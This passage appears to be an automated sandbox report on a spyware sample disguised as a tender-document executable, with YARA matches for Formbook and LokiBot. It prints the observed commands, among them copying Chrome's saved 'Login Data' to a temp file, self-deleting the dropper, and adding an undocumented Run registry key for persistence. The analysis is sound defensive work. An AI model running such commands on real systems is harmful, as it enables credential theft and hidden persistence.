      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00566E05
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_0056060D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00564235
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00565EA9
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00567356
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00564B17
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00565F3A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_005657C5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_0056679F
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E86E30
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E9EBB0
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E7B090
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02F21002
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E7841F
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E7D5E0
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02F31D55
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E60D20
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E84120
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02E6F900
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ED110
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ED9C0
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EE201
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EE557
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EE554
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006D2D90
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EDE45
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006D9E20
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006D9E1B
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EE7E0
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006D2FB0
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: String function: 02E6B150 appears 32 times
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000001.00000002.268000879.000000000040F000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.369450389.000000001DD80000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmp  Binary or memory string: OriginalFilenamewlanext.exej% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.372432582.000000001E32F000.00000040.00000001.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000000.266922837.000000000040F000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Binary or memory string: OriginalFilenameEPICENTRAL.exe vs 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000002.520702711.000000000336F000.00000004.00000001.sdmp, type: MEMORY  Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000010.00000002.514310291.00000000009AD000.00000004.00000020.sdmp, type: MEMORY  Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORY  Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@10/5@3/3
      Source: C:\Windows\SysWOW64\wlanext.exe  File created: C:\Users\user\AppData\Roaming\730-O-47
      Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4424:120:WilError_01
      Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  File created: C:\Users\user~1\AppData\Local\Temp\~DFE55D899C06056F58.TMP
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Virustotal: Detection: 33%
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  ReversingLabs: Detection: 51%
      Source: unknown  Process created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknown  Process created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknown  Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: unknown  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: unknown  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown  Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
      Source: unknown  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Process created: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: C:\Windows\SysWOW64\wlanext.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe'
      Source: C:\Windows\SysWOW64\wlanext.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V
      Source: C:\Windows\SysWOW64\wlanext.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
      Source: C:\Windows\SysWOW64\wlanext.exe  File written: C:\Users\user\AppData\Roaming\730-O-47\730logri.ini
      Source: C:\Windows\SysWOW64\wlanext.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.341334406.000000000E9F0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.370768381.000000001E210000.00000040.00000001.sdmp, wlanext.exe, 00000010.00000002.517643886.0000000002F5F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, wlanext.exe
      Source: Binary string: wlanext.pdb source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmp
      Source: Binary string: wlanext.pdbGCTL source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.341334406.000000000E9F0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match  File source: Process Memory Space: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe PID: 1516, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match  File source: Process Memory Space: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe PID: 1516, type: MEMORY
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_00401190 push ds; iretd 1_2_004011FF
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_00409447 push es; ret 1_2_0040944A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_0040540F push ss; ret 1_2_00405412
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_00402086 push ds; iretd 1_2_0040208E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_0040752B push ss; ret 1_2_00407532
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_004039D5 push ebp; iretd 1_2_004039D6
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 1_2_004011AC push ds; iretd 1_2_004011FF
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_1E28D0D1 push ecx; ret 3_2_1E28D0E4
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_02EBD0D1 push ecx; ret 16_2_02EBD0E4
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006E7072 push edx; iretd 16_2_006E7085
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006E7B98 push es; iretd 16_2_006E7B99
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ECDF5 push eax; ret 16_2_006ECE48
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006DC678 push ebx; iretd 16_2_006DC679
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ECE4B push eax; ret 16_2_006ECEB2
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ECE42 push eax; ret 16_2_006ECE48
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006ECEAC push eax; ret 16_2_006ECEB2
      Source: C:\Windows\SysWOW64\wlanext.exe  Code function: 16_2_006EE7D0 push ss; iretd 16_2_006EE7D3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  File created: \1-rfq-iocl-pp-in-301 bid instructionscommercial terms and conditions-2020-10-14..exe

      Boot Survival:

      Creates an undocumented autostart registry key
      Source: C:\Windows\SysWOW64\wlanext.exe  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run CZP4HB18T0HL

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe  User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:
